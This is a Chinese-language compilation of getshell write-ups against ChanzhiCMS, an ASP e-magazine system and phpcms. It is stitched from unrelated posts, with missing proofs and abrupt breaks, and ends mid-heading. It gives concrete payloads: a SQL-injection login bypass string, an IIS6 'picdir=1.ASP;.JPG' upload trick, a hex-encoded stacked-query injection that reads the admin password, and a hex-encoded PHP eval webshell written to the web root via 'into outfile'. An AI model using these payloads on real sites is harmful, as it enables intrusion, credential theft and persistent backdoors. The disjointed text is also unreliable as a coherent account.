标签：getshell

详细说明：

/system/module/package/control.php

PHP

后台这里上传文件的时候，没有判断文件后缀，直接通过move_uploaded_file移动到package目录下了。而这里没有token，所以可以通过CSRF漏洞getshell。

漏洞证明：

POC：

管理员点击后，成功创建文件。

成功执行phpinfo

蝉知CMS5.3 CRSF getshell

最近在看一套信息分类系统。看了好久毫无头绪，结果意外的发现了他们使用了万众电子期刊ASP版本。于是找来源码看了下。意外的发现了sql注入以及集合IIS6的getshell

1.sql注入

ASP

‘登录验证

sub login

username=request.form(“username”)

password=request.form(“password”)

if username=””or password=”” then

response.write”<script>alert(‘账号和密码不能为空！’);</script>”

else

set rs=server.createobject(“adodb.recordset”)

sql=”select * from W_user where W_user_name='”&username&”‘ and W_user_password='”&md5(password)&”‘”

rs.open sql,conn,1,1

if rs.eof then

response.write”<script>alert(‘用户名或密码错误！’);</script>”

else

Session(“login_user_name”)=username

Session(“login_user_password”)=md5(password)

response.write”<script>location.href = ‘index.asp'</script>”

end if

end if

end sub

很明显的

Transact-SQL

sql=”select * from W_user where W_user_name='”&username&”‘ and W_user_password='”&md5(password)&”‘”

直接就admin’or’=’or’就可以万能密码登录了

2.getshell 需要结合解析来进行

ASP

<%

response.charset = “GBK”

dim picdir

picdir = request.querystring(“picdir”)

if request.querystring(“menu”) = “up” then

dim fileup,formpath,file,filename

picdir2 = request.querystring(“picdir”)

‘当点击了上传之后，执行上传操作

set fileup=new Upload_file  ‘实例化一个类 fileup就是一个对象

fileup.GetDate(-1)   ‘

formpath=”upload/” & picdir2 & “/” ‘上传的路径

Set fs = Server.CreateObject(“Scripting.FileSystemObject”)

If not fs.FolderExists(server.mappath(formpath)) Then

fs.CreateFolder(server.mappath(formpath))

End If

set file=fileup.file(“file”)  ‘创建一个file对象，通过上面一个对象的file方法传入一个”file”参数

‘这个方法能够返回你上传文件的后缀

‘只允许上传指定的图片文件

if file.fileext <> “jpg” and file.fileext <> “gif” and file.fileext <> “png” and file.fileext <> “jpeg” then

response.write “<script>alert(‘图片类型必须是jpg,gif,png这三种’);window.close();</script>”

response.end

end if

‘建立一个完整的路径

filename = formpath & year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now) & “.” & file.fileext

file.savetofile server.mappath(filename)

set file = nothing

set fileup = nothing

response.write “<script>a(‘”&filename&”‘);</script>”

response.write “<script>alert(‘图片上传成功’);window.close();</script>”

else

%>

<div class=”upfile”>

<form enctype=”multipart/form-data” method=”post” action=”?menu=up&amp;picdir=<%=picdir%>”>

<input type=”file” name=”file” size=”30″>

<input type=”submit” value=”上 传 ” />

</form>

</div>

<%

end if

%>

很明显，我稍微处理下

ASP

picdir = request.querystring(“picdir”)  获取dir

‘当点击了上传之后，执行上传操作

set fileup=new Upload_file  ‘实例化一个类 fileup就是一个对象

fileup.GetDate(-1)   ‘

formpath=”upload/” & picdir2 & “/” ‘上传的路径

Set fs = Server.CreateObject(“Scripting.FileSystemObject”)

If not fs.FolderExists(server.mappath(formpath)) Then

fs.CreateFolder(server.mappath(formpath))

End If

set file=fileup.file(“file”)  ‘创建一个file对象，通过上面一个对象的file方法传入一个”file”参数

‘这个方法能够返回你上传文件的后缀

如果我传入的picdir=1.ASP;.JPG那么不是就生成了这个目录。然后随便传入图片马儿就可以getshell了

前台注入
在/chanzhieps/system/module/cart/control.php页面的add函数

public function add($product, $count) $count是用户输入
我们看会员登录以后的，也就是$result = $this->cart->add($product, $count);
/chanzhieps/system/module/cart/model.php

如果能查到产品的话，更新数量set(“count= count + {$count}”)
继续跟进set函数
/chanzhieps/system/lib/base/dao/dao.class.php

可以看到直接进入了$this->sql

成功延时

坑点来了:
在解析url的时候 有一句if(strpos($uri, ‘_’) !== false) $uri = substr($uri, 0, strpos($uri, ‘_’));
不能使用下划线，但是admin表的表名为eps_user
以我目前的知识储备，应该是无解的。

然后我注意到，这个cms用的是pdo的方式连接mysql。也就是说可以多语句执行
想起来前一天看ven师傅blog的时候学到的一个技巧。

set @a:=0x73656C6563742070617373776F72642066726F6D206570735F75736572206C696D697420313B
设置变量a，后面的值是select password from eps_user limit 1;的hex值
prepare s from @a; 准备一个查询语句
execute s;执行
当然，耶可以直接更新用户为super

完美 至此，我们可以控制数据库任何数据。

后台getshell

后台getshell 一般是上传，写模板，写配置文件。
找到/system/module/upgrade/control.php

fromVersion 是用户可控的数据
跟进execute /system/module/upgrade/model.php

可控制数据库，所以$mobileTemplateConfig->lang可控 happy 写文件

my.php

漏洞存在文件phpcms\modules\dbsource\call.php的get函数中

程序调用了$data变量的数据，而这个变量可以被用户控制（在后台数据源，自定义sql语句的地方），所以可以构造任务sql语句来进行调用（语句尾用–注释掉程序原本的limit语句。

更多关注www.hackerschina.org

后台进行自定义sql，然后调用

既然可以调用任意的sql语句，则可以利用mysql的into outfile 进行文件写入，只要能找到网站程序的绝对路径即可，那么怎样得知绝对路径呢，可以利用sql语句来报错，证明如下：构造自定义sql语句：select 123 into outfile’c:\\test.txt’ — ，然后调用

可以看到程序出错，绝对路径就出来了，此外，尽管程序报错了， 但是sql语句还是顺利执行了，所以利用这个漏洞，只要构造自定义语句：select0x3C3F706870206576616C2028245F504F53545B76616C5D293B203F3E into outfile’D:\\xampp\\htdocs\\phpcms\\abc.php’ — 同样在也前台进行调用，就可以在程序的根目录下程序后门程序，从而GETSHELL。

注入分析
\inc\common.inc.php